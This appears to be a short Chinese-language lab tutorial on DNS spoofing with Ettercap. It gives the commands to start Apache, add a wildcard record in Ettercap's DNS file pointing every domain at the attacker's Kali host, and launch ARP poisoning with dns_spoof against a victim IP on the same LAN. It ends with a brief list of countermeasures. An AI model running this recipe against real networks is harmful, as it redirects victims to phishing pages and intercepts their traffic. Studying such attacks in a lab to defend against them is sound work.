4.3 DNS欺骗
Last updated
Was this helpful?
Last updated
Was this helpful?
DNS欺骗攻击基于中间人攻击。攻击者更改受害者从DNS服务器查询的域名解析结果,给受害者发送恶意网页或钓鱼网页-浏览器依然显示正常的url。
本帖介绍怎么使用Ettercap施行DNS欺骗攻击,实现受害者访问任何网站都转向到攻击者指定的网站。
同一局域网内
受害者ip:192.168.1.185
kali ip:192.168.1.184
开启apache
service apache2 start
创建一个首页文件并写入内容
编辑文件
vim /etc/ettercap/eteer.dns
添加
*A 192.168.1.184
开启欺骗
ettercap -i eth0 -T -P dns_spoof -M arp /192.168.1.185///
受害机测试
进行IP地址和MAC地址的绑定
使用Digital Password进行辨别
优化DNS SERVER的相关项目设置
直接使用IP地址访问
对DNS数据包进行监测
